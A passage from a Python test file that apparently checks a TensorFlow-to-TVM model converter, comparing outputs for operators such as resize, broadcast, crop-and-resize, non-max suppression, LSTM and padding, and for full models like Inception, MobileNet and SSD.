def _test_resize_nearest_neighbor_dynamic_shape(in_shape, scale):
""" One iteration of resize nearest neighbor for graph with dynamic input shape """
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=None, dtype=data.dtype)
# multiply input shape by scale factor
new_shape = tf.shape(in_data)[1:3] * tf.constant(scale, dtype=tf.int32)
tf.image.resize_nearest_neighbor(in_data, new_shape, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def test_forward_resize():
""" Resize Bilinear, Nearest_Neighbor """
# TF default layout is NHWC
_test_resize_bilinear((4, 32, 32, 3), [50, 50], False)
_test_resize_bilinear((6, 32, 32, 3), [20, 20], True)
_test_resize_bilinear_from_tensor((4, 32, 32, 3), False)
_test_resize_bilinear_from_tensor((6, 50, 50, 3), True)
_test_resize_nearest_neighbor((6, 32, 32, 3), [20, 20])
_test_resize_nearest_neighbor_dynamic_shape((1, 16, 16, 3), scale=[2, 2])
#######################################################################
# BroadcastArgs
# -----------
def _test_broadcast_args(in_shape_1, in_shape_2):
""" One iteration of broadcast_args"""
shape_1 = np.array(in_shape_1).astype("int32")
shape_2 = np.array(in_shape_2).astype("int32")
with tf.Graph().as_default():
shape_1 = constant_op.constant(shape_1, shape=shape_1.shape, dtype=shape_1.dtype)
shape_2 = constant_op.constant(shape_2, shape=shape_2.shape, dtype=shape_2.dtype)
tf.raw_ops.BroadcastArgs(s0=shape_1, s1=shape_2)
compare_tf_with_tvm(None, "", "BroadcastArgs:0", opt_level=0)
def test_forward_broadcast_args():
""" Resize Bilinear """
_test_broadcast_args((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_args((6, 32, 32, 1), [6, 32, 32, 16])
_test_broadcast_args((32, 32, 16), [6, 32, 32, 16])
#######################################################################
# BroadcastTo
# -----------
def _test_broadcast_to(in_shape, to_shape):
""" One iteration of broadcast_to"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0", opt_level=0)
def _test_broadcast_to_from_tensor(in_shape):
""" One iteration of broadcast_to with unknown shape at graph build"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=[None], dtype=data.dtype)
shape_data = tf.multiply(tf.shape(in_data), 32)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0")
def test_forward_broadcast_to():
""" Resize Bilinear """
_test_broadcast_to((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_to((6, 32, 32, 1), [6, 32, 32, 16])
_test_broadcast_to_from_tensor((1))
#######################################################################
# Fill
# ----
def _test_fill(in_shape):
""" Use the fill op to create a tensor of ones with non-constant shape."""
with tf.Graph().as_default():
tf.ones(shape=in_shape, dtype="float32")
compare_tf_with_tvm(in_shape, [], "ones:0", opt_level=1)
def _test_fill_from_tensor(in_shape):
"""Use the fill op to create a tensor of ones with non-constant shape.
Some extra ops need to be added here to prevent the graph from
being fully constant and folded away."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], in_shape[1], None, None], dtype=data.dtype
)
x = tf.ones(shape=2 * tf.shape(in_data), dtype=data.dtype)
y = tf.math.add(in_data, tf.reduce_mean(x), name="out1")
compare_tf_with_tvm(data, "Placeholder:0", "out1:0")
def _test_fill_symbolic_inputs(in_shape_data, in_value_data, dtype):
with tf.Graph().as_default():
in_shape = tf.placeholder(shape=[in_shape_data.shape[0]], dtype=in_shape_data.dtype)
in_value = tf.placeholder(shape=(), dtype=dtype)
out = tf.fill(in_shape, in_value)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[in_shape_data, in_value_data], [in_shape.name, in_value.name], out.name, mode=mode
)
def test_forward_fill():
""" Resize Bilinear """
_test_fill((32))
_test_fill((6, 32, 64, 64))
_test_fill_from_tensor((6, 32, 64, 64))
_test_fill_symbolic_inputs(np.array((2,)), np.int32(9), tf.int32)
_test_fill_symbolic_inputs(np.array((2, 3)), 9, tf.int64)
_test_fill_symbolic_inputs(np.array((2, 3, 4)), np.float32(9.0), tf.float32)
#######################################################################
# Crop to bounding box
# --------------------
def _test_crop(in_shape, off_h, off_w, tar_h, tar_w):
""" Crop to bounding box """
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
tf.image.crop_to_bounding_box(in_data, off_h, off_w, tar_h, tar_w)
compare_tf_with_tvm(data, "Placeholder:0", "crop_to_bounding_box/Slice:0")
def test_forward_crop():
""" Crop to bounding box """
_test_crop((1, 224, 224, 3), 20, 20, 120, 120)
#######################################################################
# CropAndResize
# -------------
def _test_forward_crop_and_resize(
img_shape,
boxes,
box_idx,
crop_size,
extrapolation_value=0.0,
method="bilinear",
dtype="float32",
):
image = np.random.uniform(0, 10, size=img_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = array_ops.placeholder(dtype, image.shape, name="in_data")
tf.image.crop_and_resize(
in_data,
boxes=boxes,
box_ind=box_idx,
crop_size=crop_size,
method=method,
extrapolation_value=extrapolation_value,
name="crop_and_resize",
)
compare_tf_with_tvm([image], ["in_data:0"], "crop_and_resize:0")
def test_forward_crop_and_resize():
""" CropAndResize """
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3])
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2)
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2, "nearest")
_test_forward_crop_and_resize([1, 11, 11, 3], [[0.3, 0.3, 1, 1]], [0], [21, 21])
_test_forward_crop_and_resize([1, 41, 41, 3], [[0.2, 0.4, 0.8, 0.8]], [0], [21, 11])
_test_forward_crop_and_resize([1, 100, 100, 3], [[0, 0, 0.9, 0.9]], [0], [30, 30])
_test_forward_crop_and_resize([1, 224, 224, 3], [[0.1, 0.2, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 249, 249, 3], [[0, 0, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 201, 301, 3], [[0.2, 0.3, 0.7, 0.8]], [0], [51, 51])
_test_forward_crop_and_resize(
img_shape=[10, 11, 11, 3],
boxes=[[0, 0, 0.9, 0.9], [0.2, 0.2, 0.8, 0.8]],
box_idx=[0, 1],
crop_size=[5, 5],
)
_test_forward_crop_and_resize(
img_shape=[20, 576, 576, 3],
boxes=[[0, 0, 1, 1], [0, 0, 0.8, 0.8], [0.1, 0.2, 0.9, 1], [0.2, 0, 1, 1]],
box_idx=[1, 0, 2, 3],
crop_size=[24, 24],
extrapolation_value=0.3,
)
_test_forward_crop_and_resize(
img_shape=[20, 229, 229, 3],
boxes=[[0, 0, 0.9, 0.9], [0.3, 0.3, 1, 1], [0.2, 0.1, 0.7, 0.8], [0, 0, 1, 1]],
box_idx=[3, 0, 2, 1],
crop_size=[58, 58],
extrapolation_value=0.2,
method="nearest",
)
#######################################################################
# Non Max Suppression
# -------------------
def _test_forward_nms_v3(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="debug",
)
def _test_forward_nms_v4(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
indices_padded, num_valid = tf.image.non_max_suppression_padded(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
pad_to_max_output_size=True,
)
num_valid = tf.reshape(num_valid, shape=(-1,))
indices_padded = tf.reshape(indices_padded, shape=(-1,))
tf.slice(indices_padded, tf.constant([0]), num_valid, name="SlicedIndices")
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="debug",
)
def _test_forward_nms_v5(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression_with_scores(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV5:0", "nms/NonMaxSuppressionV5:1"],
mode="vm",
)
def test_forward_nms():
""" NonMaxSuppressionV3,5 """
for _test_forward_nms in [_test_forward_nms_v3, _test_forward_nms_v5]:
_test_forward_nms((5, 4), (5,), 0.7, 0.5, 5)
_test_forward_nms((20, 4), (20,), 0.5, 0.6, 10)
_test_forward_nms((1000, 4), (1000,), 0.3, 0.7, 1000)
_test_forward_nms((2000, 4), (2000,), 0.4, 0.6, 7)
def _test_forward_combined_nms(
bx_shape,
score_shape,
iou_threshold,
score_threshold,
out_size,
total_size,
clip_boxes=False,
dtype="float32",
):
boxes = np.random.uniform(-1, 2, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.combined_non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size_per_class=in_data_3,
max_total_size=total_size,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
pad_per_class=False,
clip_boxes=clip_boxes,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
[
"nms/CombinedNonMaxSuppression:0",
"nms/CombinedNonMaxSuppression:1",
"nms/CombinedNonMaxSuppression:2",
"nms/CombinedNonMaxSuppression:3",
],
mode="vm",
)
def test_forward_combined_nms():
""" CombinedNonMaxSuppression """
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 1), 0.7, 0.5, 64, 64)
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 20), 0.7, 0.5, 64, 10)
_test_forward_combined_nms((1, 64, 20, 4), (1, 64, 20), 0.7, 0.5, 64, 64, clip_boxes=True)
_test_forward_combined_nms((2, 200, 1, 4), (2, 200, 1), 0.4, 0.6, 100, 100)
#######################################################################
# LSTM
# ----
def _test_lstm_cell(batch_size, num_hidden, num_layers, forget_bias, dtype):
""" One iteration of a LSTM cell """
tf.reset_default_graph()
input_size = num_hidden
input_data = np.full((batch_size, input_size), 1.0, dtype=dtype)
in_state_c = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
in_state_h = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
def _get_tensorflow_output():
with tf.Session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)
):
m0 = tf.placeholder(dtype, [batch_size, num_hidden], name="m0")
m1 = tf.placeholder(dtype, [batch_size, num_hidden], name="m1")
x = tf.placeholder(shape=(batch_size, input_size), dtype=dtype, name="input")
g, ((out_m0, out_m1)) = tensorflow.contrib.rnn.LSTMBlockCell(
num_hidden, forget_bias=forget_bias
)(x, (m0, m1))
sess.run([variables.global_variables_initializer()])
res = sess.run(
[g, out_m0, out_m1],
{
x.name: np.array([[1.0, 1.0]]),
m0.name: in_state_c,
m1.name: in_state_h,
},
)
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(
sess, graph_def, ["root/lstm_cell/LSTMBlockCell"]
)
return final_graph_def, res
graph_def, tf_out = _get_tensorflow_output()
tvm_output = run_tvm_graph(
graph_def,
[input_data, in_state_c, in_state_h],
["root/input", "root/m0", "root/m1"],
num_output=7,
)
assert isinstance(tvm_output, list)
tvm.testing.assert_allclose(tf_out[0], tvm_output[6], rtol=1e-3, atol=1e-3)
tvm.testing.assert_allclose(tf_out[1], tvm_output[1], rtol=1e-3, atol=1e-3)
def test_forward_lstm():
"""test LSTM block cell"""
if package_version.parse(tf.VERSION) < package_version.parse("2.0.0"):
# in 2.0, tf.contrib.rnn.LSTMBlockCell is removed
_test_lstm_cell(1, 2, 1, 0.5, "float32")
#######################################################################
# Pack
# ---
def _test_pack(axis, shape, **kwargs):
a = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
b = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
with tf.Graph().as_default():
tf_a = array_ops.placeholder(shape=shape, dtype="float32", name="pl_a")
tf_b = array_ops.placeholder(shape=shape, dtype="float32", name="pl_b")
tf_c = tf.stack([tf_a, tf_b], axis=axis, **kwargs)
assert tf_c.op.op_def.name == "Pack", "tf.stack() is expected to produce 'Pack' operation"
compare_tf_with_tvm([a, b], ["pl_a:0", "pl_b:0"], "stack:0")
def test_forward_pack():
for axis in range(-3, 3):
_test_pack(axis, [3, 2, 1])
for axis in range(-1, 1):
_test_pack(axis, [3])
_test_pack(0, [])
#######################################################################
# Unpack
# ------
def _test_forward_unpack(in_shape, axis, dtype):
"""test operator Unpack"""
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.unstack(in_data, axis=axis, name="Unpack")
compare_tf_with_tvm([np_data], ["in_data:0"], "Unpack:0")
def test_forward_unpack():
_test_forward_unpack((3,), 0, "int32")
_test_forward_unpack((3,), -1, "int16")
_test_forward_unpack((21, 23, 3), 2, "float32")
#######################################################################
# Range
# -----
def test_forward_range():
"""test operator Range"""
for dtype in [tf.int32, tf.int64]:
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 18, 3, name="range", dtype=dtype)
compare_tf_with_tvm([], [], "range:0")
"""test type assignment for operator Range"""
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 256 + 1, 1, dtype=tf.float32)
compare_tf_with_tvm([], [], "range:0")
#######################################################################
# Pad
# ---
def _test_pad(input_shape, paddings, mode, **kwargs):
""" One iteration of pad operation with given shape"""
x = np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape)
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
pad_values = constant_op.constant(paddings)
pad = tf.pad(in_data, paddings=pad_values, mode=mode, **kwargs)
if mode == "CONSTANT":
if "constant_values" in kwargs:
out_name = "PadV2:0"
else:
out_name = "Pad:0"
else:
out_name = "MirrorPad:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def test_forward_pad():
""" Pad """
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT", constant_values=1.0)
_test_pad((2, 3), [[1, 1], [2, 2]], mode="SYMMETRIC")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="REFLECT")
#######################################################################
# Logical operators
# --------------------
def test_logical_and():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_and(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_or():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_or(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_xor():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_xor(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_not():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
out = tf.logical_not(in1, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm(in_data1, "in1:0", "out:0")
def test_forward_logical():
test_logical_and()
test_logical_or()
test_logical_xor()
test_logical_not()
#######################################################################
# Where, Select, SelectV2
# -------------
def test_forward_where():
""" Where: return elements depending on conditions"""
with tf.Graph().as_default():
with tf.Session() as sess:
input1 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input1")
input2 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input2")
mask = input1 > input2
tf.where(mask, input1 + 1, input2 * 2)
in_data1 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
in_data2 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
compare_tf_with_tvm([in_data1, in_data2], ["input1:0", "input2:0"], "Select:0")
#######################################################################
# Inception V3
# ------------
def test_forward_inception_v3():
"""test inception V3 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"InceptionV3/inception_v3_2016_08_28_frozen-with_shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 299, 299, 3)).astype("float32")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input:0", "InceptionV3/Predictions/Reshape_1:0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Inception V1
# ------------
def test_forward_inception_v1():
"""test inception V1 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("InceptionV1/classify_image_graph_def-with_shapes.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
# Build an image from random data.
from PIL import Image
from tvm.contrib import utils
img_array = np.random.uniform(size=(1, 600, 600, 3)).astype("uint8")
img = Image.frombuffer("RGB", (600, 600), img_array.tostring(), "raw", "RGB", 0, 1)
temp = utils.tempdir()
img_path = temp.relpath("tf-test.jpg")
img.save(img_path)
import os.path
if not tf.gfile.Exists(os.path.join(img_path)):
tf.logging.fatal("File does not exist %s", img_path)
data = tf.gfile.FastGFile(os.path.join(img_path), "rb").read()
temp.remove()
# Extract tensorflow decoded image frame for tvm input
with tf.Session() as sess:
tvm_data = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "DecodeJpeg:0")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "softmax:0")
tvm_output = run_tvm_graph(graph_def, tvm_data, "DecodeJpeg/contents")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Mobilenet
# ---------
def test_forward_mobilenet():
"""test mobilenet model"""
# MobilenetV2
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"https://storage.googleapis.com/mobilenet_v2/checkpoints/mobilenet_v2_1.4_224.tgz",
"mobilenet_v2_1.4_224_frozen.pb",
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "MobilenetV2/Predictions/Reshape_1"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "input:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# ResnetV2
# --------
@tvm.testing.requires_gpu
def test_forward_resnetv2():
"""test resnet model"""
if is_gpu_available():
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"ResnetV2/resnet-20180601_resnet_v2_imagenet-shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(128, 224, 224, 3)).astype("float32")
out_node = "ArgMax"
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input_tensor:0", out_node + ":0")
for device in ["llvm", "cuda"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def, data, "input_tensor", len(tf_output), target=device
)
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# SSD
# ---
def _test_ssd_impl():
"""Test SSD with backbone MobileNet V1"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"object_detection/ssd_mobilenet_v1_ppn_shared_"
"box_predictor_300x300_coco14_sync_2018_07_03.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(0.0, 255.0, size=(1, 512, 512, 3)).astype("uint8")
in_node = "image_tensor"
out_node = ["detection_boxes", "detection_scores", "detection_classes"]
with tf.Session() as sess:
tf_output = run_tf_graph(
sess, data, "{}:0".format(in_node), ["{}:0".format(oname) for oname in out_node]
)
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
data,
in_node,
len(out_node),
target=device,
layout="NCHW",
out_names=out_node,
mode="vm",
disabled_pass=["FoldScaleAxis"],
serialize=True,
)
for i in range(len(out_node)):
tvm.testing.assert_allclose(tvm_output[i], tf_output[i], rtol=1e-3, atol=1e-3)
def test_forward_ssd():
run_thread = threading.Thread(target=_test_ssd_impl, args=())
old_stack_size = threading.stack_size(100 * 1024 * 1024)
run_thread.start()
run_thread.join()
threading.stack_size(old_stack_size)
#######################################################################
# Placeholder
# -----------
def test_forward_placeholder():
"""test a simple pb with Placeholder node in the end of GraphDef"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("Custom/placeholder.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "mul"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "Placeholder:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "Placeholder")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# PTB
# ---
try:
# Load contrib for running ptb model in tf version before 2.0
import tensorflow.contrib
except:
pass
def test_forward_ptb():
"""test ptb model"""
config = tf_testing.get_config()
num_steps = config.num_steps
num_hidden = config.hidden_size
num_layers = config.num_layers
batch_size = config.batch_size
vocab_size = config.vocab_size
out_sample_shape = (batch_size, vocab_size)
out_state_shape = (batch_size, num_hidden)
# Sample input
inpt = "we have no useful information on"
cnt_sample = 20
def _pretty_print(items, is_char_model, id2word):
if not is_char_model:
return " ".join([id2word[x] for x in items])
else:
return "".join([id2word[x] for x in items]).replace("_", " ")
def _get_tvm_graph_module(graph_def):
# Cell inputs 'c and 'h' consist of all layers values
shape_dict = {"Model/Placeholder": (batch_size, num_steps)}
mod, params = relay.frontend.from_tensorflow(
graph_def,
shape=shape_dict,
outputs=[
"Model/Softmax:0",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:6",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:6",
],
)
target = "llvm"
with tvm.transform.PassContext(opt_level=0):
graph, lib, params = relay.build(mod, target, params=params)
from tvm.contrib import graph_executor
dev = tvm.cpu(0)
return params, graph_executor.create(graph, lib, dev)
def _do_tvm_sample(model, data, in_states, params, num_samples):
"""Sampled from the model"""
samples = []
state = in_states
sample = None
def _get_sample(data, state):
input_data = np.full((batch_size, num_steps), data, dtype="int32")
model.set_input("Model/Placeholder", tvm.nd.array(input_data.astype("int32")))
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros",
tvm.nd.array(state[0].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros_1",
tvm.nd.array(state[1].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros",
tvm.nd.array(state[2].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros_1",
tvm.nd.array(state[3].astype("float32")),
)
model.set_input(**params)
model.run()
tvm_output = model.get_output(0, tvm.nd.empty(out_sample_shape, "float32")).asnumpy()
state_output = []
for i in range(4):
state_output.append(
model.get_output(i + 1, tvm.nd.empty(out_state_shape, "float32")).asnumpy()
)
sample = tf_testing.pick_from_weight(tvm_output[0])
return sample, state_output
for x in data:
sample, state = _get_sample(x, state)
if sample is not None:
samples.append(sample)
else:
samples.append(0)
k = 1
while k < num_samples:
sample, state = _get_sample(samples[-1], state)
samples.append(sample)
k += 1
return samples, state
with tf.Graph().as_default():
word_to_id, id_to_word, graph_def = tf_testing.get_workload_ptb()
vocab_size = len(word_to_id)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
sess = tf.Session()
# TVM graph module creation
params, m = _get_tvm_graph_module(graph_def)
# Create 10 predicted statments of 20 words
cnt_stm = 0
while cnt_stm < 10:
cnt_stm += 1
in_state = [np.full((batch_size, num_hidden), 0, dtype="float32")] * 2 * num_layers
seed_for_sample = inpt.split()
tvm_samples, tvm_state = _do_tvm_sample(
m, [word_to_id[word] for word in seed_for_sample], in_state, params, cnt_sample
)
tvm_sample_str = _pretty_print(tvm_samples, False, id_to_word)
tf_samples, tf_state = tf_testing.do_tf_sample(
sess, [word_to_id[word] for word in seed_for_sample], in_state, cnt_sample
)
tf_sample_str = _pretty_print(tf_samples, False, id_to_word)
inpt = tvm_sample_str
tvm.testing.assert_allclose(tf_samples, tvm_samples, rtol=1e-5, atol=1e-5)
assert tvm_sample_str == tf_sample_str
#######################################################################
# LRN (Local Response Normalization)
# ----------------------------------
def _test_lrn(ishape, size, axis, bias, alpha, beta):
""" testing local response normalization """
lrn_depth_radius = size / 2
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype, name="lrn0_data")
nn_ops.local_response_normalization(
in1, name="lrn", depth_radius=lrn_depth_radius, bias=bias, alpha=alpha, beta=beta
)
compare_tf_with_tvm(inp_array, "lrn0_data:0", "lrn:0")
def test_forward_lrn():
_test_lrn((1, 3, 20, 20), 3, 1, 1.0, 1.0, 0.5)
#######################################################################
# l2_normalize
# ------------
